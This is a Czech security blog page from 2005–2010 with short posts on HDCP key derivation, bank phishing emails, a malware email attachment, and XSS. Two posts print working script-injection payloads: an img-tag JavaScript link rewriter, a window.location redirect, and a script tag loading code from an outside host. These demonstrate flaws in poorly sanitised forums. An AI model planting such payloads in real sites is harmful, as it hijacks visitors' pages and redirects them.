Security

HDCP MASTER KEY

1. října 2010 v 13:10 | Darkside
This is a forty times forty element matrix of fifty-six bit hexadecimal numbers.
To generate a source key, take a forty-bit number that (in binary) consists of twenty ones and twenty zeroes; this is the source KSV. Add together those twenty rows of the matrix that correspond to the ones in the KSV (with the lowest bit in the KSV corresponding to the first row), taking all elements modulo two to the power of fifty-six; this is the source private key.
To generate a sink key, do the same, but with the transposed matrix.

Your computer is...

5. září 2010 v 5:09 | Joey
Ha. Našel jsem další skvělý způsob jak se dostat do tvého stroje. Po broučkovi, který ti hackne LCD, je tu skvělý skript, který mi řekne o tvém stroji to nejdůležitější - a co víc, zdá se, že je to zatím jediný takový nástroj svého druhu. Pokračujte jen na vlastní nebezpečí!

Hacknuté LCD

26. srpna 2010 v 23:53 | Joey
Varování: Tento článek obsahuje nebezpečný kód a pokud budete pokračovat ve čtení může dojít k napadení vašeho počítače a LCD obrazovky.

Rhybáření ve vodách České Spořitelny

11. října 2006 v 22:31 | Joey
Tak ani spořka (ČS a.s.) se nevyhnula rhybářům. Ve své schránce pohledejte mail s předmětem "Ceska sporitelna - Pozor! Nove bezpecnostni standardy.". Rhybáři jsou veselí kuci a tak využívají právě nových bezpečnostních opatření proti nim samotným jako udičku na své nové "klienty".

Napsala mi Maria

8. října 2006 v 8:10 | Joey
Zajímavý bordel mi přišel poštou. Neumělou češtinou napsaný mail od mé přítelkyně (zřejmě) Marie:
 Vážení zákazníky a zákazníci
Úcet
Údaje jsou vytvorené jako príloha a poslané s tímto oznamením
Pourívám bezplatnou verze antispama, ktery už odstranil 227 spamových pisem
Pro soukromé použivatelé antispam je celkem bezplatný
K tomu přihodila super hyper mega antispam ovelikosti několika málo kB (Ucet.exe v Ucet.zip). Je to skvělé, že dnes v době gigabajtových instalací někdo ještě dokáže vytvořit užitečný program o zlomkové velikosti a navíc jej dát zcela zdarma komukoli. Hned jsem si to pustil a vypadá to, že běží automaticky jako služba. I když budu muset systém nějak prohlídnout, protože poslední dobou mě něěěěěěěěěěějak zlobýýýýý kásnicevle ...

XSS pomocí obrázku

16. května 2006 v 23:07 | Joey
Jedné starší, ale snadné XSS záležitosti je možno dosáhnout pomocí obyčejného obrázku (tagu <img>), resp. obsahu jeho src atributu. MSIE totiž velmi aktivně zpracuje také JavaScript zapsaný v tomto atributu a tak se například vložením následujícího textu do špatně ošetřeného fóra či diskuse nahradí všechny odkazy na stránce za odkaz na tento článeček:
 <img src='JavaScript:{dest="http://wwww.blog.cz/0605/xss-pomoci-obrazku"; 
for (i=0; i<document.links.length; i++)
{document.links[i].href=dest;}
for (i=0; i<parent.document.links.length; i++)
{parent.document.links[i].href=dest;}}'>

GetPaid hacked?

27. ledna 2006 v 1:24 | Joey
Vypadá to, že GetPaid.cz je v podivném (nedobrovolném) maintenance módu.

Security leak

22. října 2005 v 20:32 | Joey

Chyba

Tato stránka slouží jen jako cíl pro jiné napadnutelné stránky. Pokud jste sem byli automaticky přesměrováni, má pravděpodobně zdrojový server problém se zabezpečením.

Použitý kód (varianta 1):
<script language="JavaScript">
<!--
window.location = "http://wwww.blog.cz/0510/security-leak";
//-->
</script>
Způsobí přesměrování stránky na tento článek.

Použitý kód (varianta 2):
<script language="JavaScript" src="http://renemihula.wz.cz/sp.js"></script>
Způsobí nahrazení všech odkazů za odkaz na tento článek. Lze použít bez uvozovek pokud je vkládaný text nahrazuje.
 
 

Reklama